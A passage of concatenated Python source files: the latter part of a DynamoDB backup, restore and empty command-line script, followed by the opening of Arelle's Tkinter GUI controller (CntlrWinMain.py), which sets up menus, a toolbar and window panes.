if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) + " unprocessed items, retrying after %s seconds.. [%s/%s]" % (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " + json.dumps(unprocessed_items,
indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
while True:
if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def do_empty(conn, table_name):
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = conn.describe_table(table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(conn, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
conn.create_table(table_attribute_definitions, table_name, table_key_schema, table_provisioned_throughput,
table_local_secondary_indexes, table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(conn, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(conn, table_name, read_capacity):
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + "/" + table_name):
shutil.rmtree(args.dumpPath + "/" + table_name)
mkdir_p(args.dumpPath + "/" + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + "/" + table_name + "/" + SCHEMA_FILE, "w+")
table_desc = conn.describe_table(table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + "/" + table_name + "/" + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
scanned_table = conn.scan(table_name, exclusive_start_key=last_evaluated_key)
f = open(args.dumpPath + "/" + table_name + "/" + DATA_DIR + "/" + str(i).zfill(4) + ".json", "w+")
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_restore(conn, sleep_interval, source_table, destination_table, write_capacity):
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.." % (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!" % (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + "/" + source_table + "/" + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " + str(write_capacity))
while True:
try:
conn.create_table(table_attribute_definitions, table_table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(conn, destination_table, "created")
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + "/" + source_table + "/" + DATA_DIR + "/")
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(open(dump_data_path + "/" + source_table + "/" + DATA_DIR + "/" + data_file))
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) + " items to " + destination_table + "..")
batch_write(conn, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(conn, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != gsi["ProvisionedThroughput"]["WriteCapacityUnits"]:
gsi_data.append({"Update": {"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]),
"WriteCapacityUnits": int(original_gsi_write_capacity)}}})
logging.info("Updating " + destination_table + " global secondary indexes write capacities as necessary..")
while True:
try:
conn.update_table(destination_table, global_secondary_index_updates=gsi_data)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info(
"Limit exceeded, retrying updating throughput of GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info(
"Control plane limit exceeded, retrying updating throughput of GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(conn, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " + str(datetime.datetime.now().replace(microsecond=0) - start_time))
def get_credentials(profile, region):
try:
session = boto3.Session(profile_name=profile, region_name=region)
except BotoCoreError:
return None
credentials = session.get_credentials()
return credentials
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-m", "--mode", help="'backup' or 'restore' or 'empty'")
parser.add_argument("-r", "--region",
help="AWS region to use, e.g. 'us-west-1'. Use '" + LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB [required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB [required only for local]")
parser.add_argument("--sessionToken", help="Session token for AWS profile, aka security token [required for temporary AWS sessions unless profile specified]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a profile instead of accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, use 'tablename*' for wildcard prefix selection or '*' for all tables")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, use 'tablename*' for wildcard prefix selection (defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup from [optional]")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore to [defaults to " + str(
RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. Can be used with both backup and restore modes. Cannot be used with the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table backups (defaults to use '" + str(DATA_DUMP) + "') [optional]", default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL [optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = DynamoDBConnection(aws_access_key_id=args.accessKey, aws_secret_access_key=args.secretKey, host=args.host,
port=int(args.port), is_secure=False)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey,
security_token=args.sessionToken)
sleep_interval = AWS_SLEEP_INTERVAL
else:
credentials = get_credentials(profile=args.profile, region=args.region)
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=credentials.access_key,
aws_secret_access_key=credentials.secret_key,
security_token=credentials.token)
sleep_interval = AWS_SLEEP_INTERVAL
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) + " table(s) in DynamoDB host to backup: " + ", ".join(
matching_backup_tables))
threads = []
for table_name in matching_backup_tables:
t = threading.Thread(target=do_backup, args=(conn, table_name, args.readCapacity,))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Backup of table(s) " + args.srcTable + " completed!")
else:
do_backup(conn, args.srcTable, args.readCapacity)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) + " table(s) in DynamoDB host" + delete_str + ", ".join(
matching_destination_tables))
threads = []
for table_name in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table_name,))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) + " table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table, source_table, args.writeCapacity))
else:
t = threading.Thread(target=do_restore, args=(conn, sleep_interval, source_table,
change_prefix(source_table, args.srcTable, dest_table,
prefix_separator), args.writeCapacity,))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " + dest_table + " completed!")
else:
delete_table(conn, sleep_interval, dest_table)
do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) + " table(s) in DynamoDB host to empty: " + ", ".join(
matching_backup_tables))
threads = []
for table_name in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table_name))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
|
CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re, fnmatch
if sys.platform == 'win32' and getattr(sys, 'frozen', False):
# need the .dll directory in path to be able to access Tk and Tcl DLLs efore importinng Tk, etc.
os.environ['PATH'] = os.path.dirname(sys.executable) + ";" + os.environ['PATH']
from tkinter import (Tk, Tcl, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
try:
import syslog
except ImportError:
syslog = None
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.FileSource import saveFile as writeToFile
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewFileFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # mac Python fonts bigger than other apps (terminal, text edit, Word), and to windows Arelle
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
self.iconImage = PhotoImage(file=imgpath + "arelle.gif") # must keep reference during life of window
parent.tk.call('wm', 'iconphoto', parent._w, self.iconImage)
#parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
(_("Reopen"), self.fileReopen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
(_("Save As..."), self.fileSave, None, None),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",True)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateDedupCalcs = self.config.setdefault("validateDedupCalcs",False)
self.validateDedupCalcs = BooleanVar(value=self.modelManager.validateDedupCalcs)
self.validateDedupCalcs.trace("w", self.setValidateDedupCalcs)
validateMenu.add_checkbutton(label=_("De-duplicate calculations"), underline=0, variable=self.validateDedupCalcs, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.noCertificateCheck = self.config.setdefault("noCertificateCheck",False) # resets proxy handler stack if true
self.noCertificateCheck = BooleanVar(value=self.webCache.noCertificateCheck)
self.noCertificateCheck.trace("w", self.setNoCertificateCheck)
cacheMenu.add_checkbutton(label=_("No certificate check"), underline=0, variable=self.noCertificateCheck, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
self.showDebugMessages = BooleanVar(value=self.config.setdefault("showDebugMessages",False))
self.showDebugMessages.trace("w", self.setShowDebugMessages)
logmsgMenu.add_checkbutton(label=_("Show debug messages"), underline=0, variable=self.showDebugMessages, onvalue=True, offvalue=False)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
# view menu only if any plug-in additions provided
if any (pluginClassMethods("CntlrWinMain.Menu.View")):
viewMenu = Menu(self.menubar, tearoff=0)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.View"):
pluginMenuExtender(self, viewMenu)
self.menubar.add_cascade(label=_("View"), menu=viewMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarReopen.gif", self.fileReopen, _("Reopen"), _("Reopen last opened XBRL file or testcase(s)")),
("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
